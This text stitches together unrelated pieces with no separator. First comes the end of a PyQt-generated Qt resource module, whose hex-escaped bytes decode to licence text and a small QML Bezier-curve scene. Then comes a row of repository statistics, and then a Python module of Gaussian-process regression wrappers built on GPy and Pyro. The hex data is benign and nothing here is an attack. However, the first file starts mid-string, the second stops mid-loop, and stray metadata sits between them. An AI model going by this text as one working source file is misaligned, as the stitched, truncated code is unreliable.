\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x71\x74\x2e\x64\x69\x67\x69\
\x61\x2e\x63\x6f\x6d\x2f\x63\x6f\x6e\x74\x61\x63\x74\x2d\x75\x73\
\x2e\x0a\x2a\x2a\x0a\x2a\x2a\x20\x47\x4e\x55\x20\x4c\x65\x73\x73\
\x65\x72\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\x75\x62\x6c\x69\
\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\x67\x65\x0a\
\x2a\x2a\x20\x41\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x6c\x79\
\x2c\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x6d\x61\x79\x20\
\x62\x65\x20\x75\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\
\x65\x20\x74\x65\x72\x6d\x73\x20\x6f\x66\x20\x74\x68\x65\x20\x47\
\x4e\x55\x20\x4c\x65\x73\x73\x65\x72\x0a\x2a\x2a\x20\x47\x65\x6e\
\x65\x72\x61\x6c\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\
\x6e\x73\x65\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31\x20\
\x61\x73\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x62\x79\x20\
\x74\x68\x65\x20\x46\x72\x65\x65\x20\x53\x6f\x66\x74\x77\x61\x72\
\x65\x0a\x2a\x2a\x20\x46\x6f\x75\x6e\x64\x61\x74\x69\x6f\x6e\x20\
\x61\x6e\x64\x20\x61\x70\x70\x65\x61\x72\x69\x6e\x67\x20\x69\x6e\
\x20\x74\x68\x65\x20\x66\x69\x6c\x65\x20\x4c\x49\x43\x45\x4e\x53\
\x45\x2e\x4c\x47\x50\x4c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\
\x69\x6e\x20\x74\x68\x65\x0a\x2a\x2a\x20\x70\x61\x63\x6b\x61\x67\
\x69\x6e\x67\x20\x6f\x66\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\
\x2e\x20\x20\x50\x6c\x65\x61\x73\x65\x20\x72\x65\x76\x69\x65\x77\
\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x69\
\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x74\x6f\x0a\x2a\x2a\
\x20\x65\x6e\x73\x75\x72\x65\x20\x74\x68\x65\x20\x47\x4e\x55\x20\
\x4c\x65\x73\x73\x65\x72\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\
\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x76\x65\
\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31\x20\x72\x65\x71\x75\x69\x72\
\x65\x6d\x65\x6e\x74\x73\x0a\x2a\x2a\x20\x77\x69\x6c\x6c\x20\x62\
\x65\x20\x6d\x65\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x67\x6e\x75\x2e\x6f\x72\x67\x2f\x6c\x69\x63\x65\x6e\x73\
\x65\x73\x2f\x6f\x6c\x64\x2d\x6c\x69\x63\x65\x6e\x73\x65\x73\x2f\
\x6c\x67\x70\x6c\x2d\x32\x2e\x31\x2e\x68\x74\x6d\x6c\x2e\x0a\x2a\
\x2a\x0a\x2a\x2a\x20\x49\x6e\x20\x61\x64\x64\x69\x74\x69\x6f\x6e\
\x2c\x20\x61\x73\x20\x61\x20\x73\x70\x65\x63\x69\x61\x6c\x20\x65\
\x78\x63\x65\x70\x74\x69\x6f\x6e\x2c\x20\x44\x69\x67\x69\x61\x20\
\x67\x69\x76\x65\x73\x20\x79\x6f\x75\x20\x63\x65\x72\x74\x61\x69\
\x6e\x20\x61\x64\x64\x69\x74\x69\x6f\x6e\x61\x6c\x0a\x2a\x2a\x20\
\x72\x69\x67\x68\x74\x73\x2e\x20\x20\x54\x68\x65\x73\x65\x20\x72\
\x69\x67\x68\x74\x73\x20\x61\x72\x65\x20\x64\x65\x73\x63\x72\x69\
\x62\x65\x64\x20\x69\x6e\x20\x74\x68\x65\x20\x44\x69\x67\x69\x61\
\x20\x51\x74\x20\x4c\x47\x50\x4c\x20\x45\x78\x63\x65\x70\x74\x69\
\x6f\x6e\x0a\x2a\x2a\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\
\x31\x2c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\x69\x6e\x20\x74\
\x68\x65\x20\x66\x69\x6c\x65\x20\x4c\x47\x50\x4c\x5f\x45\x58\x43\
\x45\x50\x54\x49\x4f\x4e\x2e\x74\x78\x74\x20\x69\x6e\x20\x74\x68\
\x69\x73\x20\x70\x61\x63\x6b\x61\x67\x65\x2e\x0a\x2a\x2a\x0a\x2a\
\x2a\x20\x47\x4e\x55\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\x75\
\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\
\x67\x65\x0a\x2a\x2a\x20\x41\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\
\x65\x6c\x79\x2c\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x6d\
\x61\x79\x20\x62\x65\x20\x75\x73\x65\x64\x20\x75\x6e\x64\x65\x72\
\x20\x74\x68\x65\x20\x74\x65\x72\x6d\x73\x20\x6f\x66\x20\x74\x68\
\x65\x20\x47\x4e\x55\x0a\x2a\x2a\x20\x47\x65\x6e\x65\x72\x61\x6c\
\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\
\x76\x65\x72\x73\x69\x6f\x6e\x20\x33\x2e\x30\x20\x61\x73\x20\x70\
\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\
\x46\x72\x65\x65\x20\x53\x6f\x66\x74\x77\x61\x72\x65\x0a\x2a\x2a\
\x20\x46\x6f\x75\x6e\x64\x61\x74\x69\x6f\x6e\x20\x61\x6e\x64\x20\
\x61\x70\x70\x65\x61\x72\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\
\x20\x66\x69\x6c\x65\x20\x4c\x49\x43\x45\x4e\x53\x45\x2e\x47\x50\
\x4c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\x69\x6e\x20\x74\x68\
\x65\x0a\x2a\x2a\x20\x70\x61\x63\x6b\x61\x67\x69\x6e\x67\x20\x6f\
\x66\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x2e\x20\x20\x50\x6c\
\x65\x61\x73\x65\x20\x72\x65\x76\x69\x65\x77\x20\x74\x68\x65\x20\
\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x69\x6e\x66\x6f\x72\x6d\
\x61\x74\x69\x6f\x6e\x20\x74\x6f\x0a\x2a\x2a\x20\x65\x6e\x73\x75\
\x72\x65\x20\x74\x68\x65\x20\x47\x4e\x55\x20\x47\x65\x6e\x65\x72\
\x61\x6c\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\
\x65\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x33\x2e\x30\x20\x72\x65\
\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x77\x69\x6c\x6c\x20\
\x62\x65\x0a\x2a\x2a\x20\x6d\x65\x74\x3a\x20\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x67\x6e\x75\x2e\x6f\x72\x67\x2f\x63\x6f\
\x70\x79\x6c\x65\x66\x74\x2f\x67\x70\x6c\x2e\x68\x74\x6d\x6c\x2e\
\x0a\x2a\x2a\x0a\x2a\x2a\x0a\x2a\x2a\x20\x24\x51\x54\x5f\x45\x4e\
\x44\x5f\x4c\x49\x43\x45\x4e\x53\x45\x24\x0a\x2a\x2a\x0a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2f\x0a\x0a\x69\x6d\x70\
\x6f\x72\x74\x20\x51\x74\x51\x75\x69\x63\x6b\x20\x32\x2e\x30\x0a\
\x69\x6d\x70\x6f\x72\x74\x20\x43\x75\x73\x74\x6f\x6d\x47\x65\x6f\
\x6d\x65\x74\x72\x79\x20\x31\x2e\x30\x0a\x0a\x49\x74\x65\x6d\x20\
\x7b\x0a\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3a\x20\x33\x30\x30\
\x0a\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3a\x20\x32\x30\x30\
\x0a\x0a\x20\x20\x20\x20\x42\x65\x7a\x69\x65\x72\x43\x75\x72\x76\
\x65\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3a\x20\
\x6c\x69\x6e\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\
\x68\x6f\x72\x73\x2e\x66\x69\x6c\x6c\x3a\x20\x70\x61\x72\x65\x6e\
\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\x68\x6f\x72\
\x73\x2e\x6d\x61\x72\x67\x69\x6e\x73\x3a\x20\x32\x30\x0a\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x70\x72\x6f\x70\x65\x72\x74\x79\x20\
\x72\x65\x61\x6c\x20\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\
\x65\x71\x75\x65\x6e\x74\x69\x61\x6c\x41\x6e\x69\x6d\x61\x74\x69\
\x6f\x6e\x20\x6f\x6e\x20\x74\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x41\x6e\x69\x6d\
\x61\x74\x69\x6f\x6e\x20\x7b\x20\x74\x6f\x3a\x20\x31\x3b\x20\x64\
\x75\x72\x61\x74\x69\x6f\x6e\x3a\x20\x32\x30\x30\x30\x3b\x20\x65\
\x61\x73\x69\x6e\x67\x2e\x74\x79\x70\x65\x3a\x20\x45\x61\x73\x69\
\x6e\x67\x2e\x49\x6e\x4f\x75\x74\x51\x75\x61\x64\x20\x7d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\
\x72\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x20\x7b\x20\x74\x6f\x3a\
\x20\x30\x3b\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3a\x20\x32\x30\
\x30\x30\x3b\x20\x65\x61\x73\x69\x6e\x67\x2e\x74\x79\x70\x65\x3a\
\x20\x45\x61\x73\x69\x6e\x67\x2e\x49\x6e\x4f\x75\x74\x51\x75\x61\
\x64\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x6c\x6f\x6f\x70\x73\x3a\x20\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\
\x2e\x49\x6e\x66\x69\x6e\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x32\x3a\
\x20\x51\x74\x2e\x70\x6f\x69\x6e\x74\x28\x74\x2c\x20\x31\x20\x2d\
\x20\x74\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x33\x3a\x20\
\x51\x74\x2e\x70\x6f\x69\x6e\x74\x28\x31\x20\x2d\x20\x74\x2c\x20\
\x74\x29\x0a\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x54\x65\
\x78\x74\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\
\x68\x6f\x72\x73\x2e\x62\x6f\x74\x74\x6f\x6d\x3a\x20\x6c\x69\x6e\
\x65\x2e\x62\x6f\x74\x74\x6f\x6d\x0a\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x78\x3a\x20\x32\x30\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x77\x69\x64\x74\x68\x3a\x20\x70\x61\x72\x65\x6e\x74\x2e\x77\x69\
\x64\x74\x68\x20\x2d\x20\x34\x30\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x77\x72\x61\x70\x4d\x6f\x64\x65\x3a\x20\x54\x65\x78\x74\x2e\
\x57\x6f\x72\x64\x57\x72\x61\x70\x0a\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x74\x65\x78\x74\x3a\x20\x22\x54\x68\x69\x73\x20\x63\x75\
\x72\x76\x65\x20\x69\x73\x20\x61\x20\x63\x75\x73\x74\x6f\x6d\x20\
\x73\x63\x65\x6e\x65\x20\x67\x72\x61\x70\x68\x20\x69\x74\x65\x6d\
\x2c\x20\x69\x6d\x70\x6c\x65\x6d\x65\x6e\x74\x65\x64\x20\x75\x73\
\x69\x6e\x67\x20\x47\x4c\x5f\x4c\x49\x4e\x45\x5f\x53\x54\x52\x49\
\x50\x22\x0a\x20\x20\x20\x20\x7d\x0a\x7d\x0a\
"
qt_resource_name = b"\
\x00\x0a\
\x04\xb1\xbb\xe8\
\x00\x73\
\x00\x63\x00\x65\x00\x6e\x00\x65\x00\x67\x00\x72\x00\x61\x00\x70\x00\x68\
\x00\x0e\
\x05\x35\x16\x99\
\x00\x63\
\x00\x75\x00\x73\x00\x74\x00\x6f\x00\x6d\x00\x67\x00\x65\x00\x6f\x00\x6d\x00\x65\x00\x74\x00\x72\x00\x79\
\x00\x08\
\x08\x01\x5a\x5c\
\x00\x6d\
\x00\x61\x00\x69\x00\x6e\x00\x2e\x00\x71\x00\x6d\x00\x6c\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x1a\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x1a\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x5a\x38\x00\xd4\xd8\
"
qt_version = QtCore.qVersion().split('.')
if qt_version < ['5', '8', '0']:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 55.47234 | 105 | 0.726833 | 3,074 | 13,036 | 3.069941 | 0.044567 | 0.11953 | 0.141147 | 0.185652 | 0.790294 | 0.748013 | 0.7158 | 0.673519 | 0.629331 | 0.601356 | 0 | 0.398962 | 0.024394 | 13,036 | 234 | 106 | 55.709402 | 0.343057 | 0.011583 | 0 | 0.087156 | 0 | 0.834862 | 0.000311 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0.004587 | 0 | 0.013761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c7dd4529c72238c35c6c6beb16e76f296a04548 | 32,968 | py | Python | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.metrics import r2_score
import pickle
from . import helper_functions as hf
from time import time
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
try: import GPy
except ImportError: print('Install GPy to use GPR_GPy and SparseGPR_GPy.')
try: import torch
except ImportError: print('Install PyTorch.')
try:
    import pyro
    import pyro.contrib.gp as gp
    import pyro.distributions as dist
except ImportError:
    print('Install Pyro to use GPR_pyro.')
try:
    import gpytorch
except ImportError:
    print('Install gpytorch to use GPR_GPyTorch.')
class GPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
def fit(self, X_train, y_train):
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = X_train.shape[1]
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# create simple GP model
self.m = GPy.models.GPRegression(X_train,y_train,self.kernel)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
def predict(self, X_test, return_std=False):
y_pred, y_var = self.m.predict(X_test)
if return_std: return y_pred, np.sqrt(y_var)
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
def save_model(self, filename, save_trainset=True):
# np.save(filename, self.m.param_array)
save_dict = {'kernel': self.m.kern.to_dict(), 'param_array': self.m.param_array}
if save_trainset:
save_dict['X'] = np.array(self.m.X)
save_dict['Y'] = np.array(self.m.Y)
pickle.dump(save_dict, open(filename, 'wb'))
print('Model parameters are saved.')
def load_model(self, filename, X=None, Y=None):
load_dict = pickle.load(open(filename, 'rb'))
self.kernel = GPy.kern.Kern.from_dict(load_dict['kernel'])
# self.num_inducing = load_dict['num_inducing']
if 'X' in load_dict.keys() and 'Y' in load_dict.keys():
X = load_dict['X']
Y = load_dict['Y']
else:
print('The file does not contain the training data.')
print('Please provide it to the load_model through X and Y parameters.')
return None
m_load = GPy.models.GPRegression(X, Y, initialize=False, kernel=self.kernel)
m_load.update_model(False)
m_load.initialize_parameter()
m_load[:] = load_dict['param_array']
m_load.update_model(True)
self.m = m_load
return m_load
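# A minimal usage sketch for GPR_GPy (SparseGPR_GPy exposes the same
# fit/predict/score/save_model/load_model interface). The toy data below is
# illustrative only and not part of the original module:
#
#     X = np.random.rand(50, 2)
#     y = np.sin(X.sum(axis=1, keepdims=True))      # GPy expects a 2-D y
#     gpr = GPR_GPy(n_restarts_optimizer=2, verbose=False)
#     gpr.fit(X, y)
#     y_pred, y_std = gpr.predict(X, return_std=True)
#     print('R2 score:', gpr.score(X, y))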
class SparseGPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, num_inducing=10):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.num_inducing = num_inducing
def setup_model(self, X_train, y_train):
input_dim = X_train.shape[1]
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# define inducing points
# self.Z = np.random.rand(self.num_inducing,input_dim)*(X_train.max(axis=0)-X_train.min(axis=0))+X_train.min(axis=0)
# create simple GP model
# self.m = GPy.models.SparseGPRegression(X_train,y_train,Z=self.Z,kernel=self.kernel)
self.m = GPy.models.SparseGPRegression(X_train,y_train,num_inducing=self.num_inducing,kernel=self.kernel)
def fit(self, X_train, y_train):
self.setup_model(X_train, y_train)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
# if self.verbose:
# print(self.m)
return self.m
def predict(self, X_test, return_std=False):
y_pred, y_std = self.m.predict(X_test)
if return_std: return y_pred, y_std
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
def save_model(self, filename, save_trainset=True):
# np.save(filename, self.m.param_array)
save_dict = {'kernel': self.m.kern.to_dict(), 'param_array': self.m.param_array, 'num_inducing': self.num_inducing}
if save_trainset:
save_dict['X'] = np.array(self.m.X)
save_dict['Y'] = np.array(self.m.Y)
pickle.dump(save_dict, open(filename, 'wb'))
print('Model parameters are saved.')
def load_model(self, filename, X=None, Y=None):
load_dict = pickle.load(open(filename, 'rb'))
self.kernel = GPy.kern.Kern.from_dict(load_dict['kernel'])
self.num_inducing = load_dict['num_inducing']
if 'X' in load_dict.keys() and 'Y' in load_dict.keys():
X = load_dict['X']
Y = load_dict['Y']
else:
print('The file does not contain the training data.')
print('Please provide it to the load_model through X and Y parameters.')
return None
m_load = GPy.models.SparseGPRegression(X, Y, initialize=False, num_inducing=self.num_inducing, kernel=self.kernel)
m_load.update_model(False)
m_load.initialize_parameter()
m_load[:] = load_dict['param_array']
m_load.update_model(True)
self.m = m_load
return m_load
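# Sketch of the persistence round trip for SparseGPR_GPy. When a model is
# saved with save_trainset=False, the training arrays must be handed back to
# load_model explicitly (filenames and array names below are hypothetical):
#
#     sgp = SparseGPR_GPy(num_inducing=20, n_restarts_optimizer=0)
#     sgp.fit(X_train, y_train)
#     sgp.save_model('sgp.pkl', save_trainset=False)
#     sgp_restored = SparseGPR_GPy()
#     sgp_restored.load_model('sgp.pkl', X=X_train, Y=y_train)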
class SVGPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, num_inducing=10):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.num_inducing = num_inducing
def fit(self, X_train, y_train):
input_dim = X_train.shape[1]
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# define inducing points
#self.Z = np.random.rand(self.num_inducing,input_dim)*(X_train.max(axis=0)-X_train.min(axis=0))+X_train.min(axis=0)
# create simple GP model
        self.m = GPy.models.SparseGPRegression(X_train,y_train,num_inducing=self.num_inducing,kernel=self.kernel)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
def predict(self, X_test, return_std=False):
y_pred, y_std = self.m.predict(X_test)
if return_std: return y_pred, y_std
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
class GPR_pyro:
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, estimate_method='MLE', learning_rate=1e-3):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.estimate_method = estimate_method
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
def fit(self, train_x, train_y):
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
# create simple GP model
self.model = gp.models.GPRegression(train_x, train_y, self.kernel)
# optimize
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
if self.loss_fn is None: self.loss_fn = pyro.infer.Trace_ELBO().differentiable_loss
self.losses = np.array([])
n_wait, max_wait = 0, 5
for i in range(self.max_iter):
self.optimizer.zero_grad()
loss = self.loss_fn(self.model.model, self.model.guide)
loss.backward()
self.optimizer.step()
            self.losses = np.append(self.losses, loss.item())
            if self.verbose: print(i+1, loss.item())
            # guard the first iteration, where only one loss value exists yet
            dloss = self.losses[-1]-self.losses[-2] if len(self.losses) > 1 else self.tol*1000
            if 0 <= dloss < self.tol: n_wait += 1
            else: n_wait = 0
            # n_wait/max_wait are the local early-stopping counters defined above
            if n_wait >= max_wait: break
    def predict(self, X_test, return_std=True, return_cov=False):
        if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
        y_mean, y_cov = self.model(X_test, full_cov=True, noiseless=False)
        if return_std:
            y_std = y_cov.diag().sqrt()
            return y_mean.detach().numpy(), y_std.detach().numpy()
        if return_cov: return y_mean.detach().numpy(), y_cov.detach().numpy()
        return y_mean.detach().numpy()
def score(self, X_test, y_test):
y_pred = self.predict(X_test, return_std=False, return_cov=False)
scr = r2_score(y_test, y_pred)
return scr
class SparseGPR_pyro:
def __init__(self, max_iter=1000, tol=0.001, kernel=None, error_fn=None, loss_fn=None, verbose=True, n_Xu=10, n_jobs=0, estimate_method='MLE', learning_rate=1e-3, method='VFE', n_restarts_optimizer=5, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.estimate_method = estimate_method
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.n_Xu = n_Xu
self.method = method
self.error_fn = mean_squared_error if error_fn is None else error_fn
self.validation = validation
# # Initialise output
self.model = None
self.losses = None
self.optimizer = None
self.continue_run = False
self.train_err = None
self.valid_err = None
def fit_1out(self, train_x, train_y, n_Xu=None, past_info=None):
if n_Xu is not None: self.n_Xu = n_Xu
if self.validation is not None:
if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
self.Xu = np.linspace(train_x.min(axis=0)[0].data.numpy(), train_x.max(axis=0)[0].data.numpy(), self.n_Xu)
self.Xu = torch.from_numpy(self.Xu)
# create simple GP model
model = gp.models.SparseGPRegression(train_x, train_y, self.kernel, Xu=self.Xu, jitter=1.0e-5, approx=self.method) if past_info is None else past_info['model']
# optimize
optimizer = torch.optim.Adam(model.parameters(), lr=self.learning_rate) if past_info is None else past_info['optimizer']
if self.loss_fn is None: self.loss_fn = pyro.infer.Trace_ELBO().differentiable_loss
losses = np.array([]) if past_info is None else past_info['losses']
tr_err, vl_err = 10000, 10000
if self.validation is not None:
train_err = np.array([]) if past_info is None else past_info['train_err']
valid_err = np.array([]) if past_info is None else past_info['valid_err']
n_wait, max_wait = 0, 5
for i in range(losses.size,self.max_iter):
optimizer.zero_grad()
loss = self.loss_fn(model.model, model.guide)
loss.backward()
optimizer.step()
losses = np.append(losses,loss.item())
if self.validation is not None:
# print(type(train_y))
tr_err = self.error_fn(train_y.detach().numpy(), model(train_x, full_cov=False)[0].detach().numpy())
vl_err = self.error_fn(valid_y, model(valid_x, full_cov=False)[0].detach().numpy())
train_err = np.append(train_err, tr_err)
valid_err = np.append(valid_err, vl_err)
if self.verbose:
hf.loading_verbose(' ')
                hf.loading_verbose('{0} | loss={1:.2f} | train_error={2:.3f} | validation_error={3:.3f}'.format(i+1, loss.item(), tr_err, vl_err))
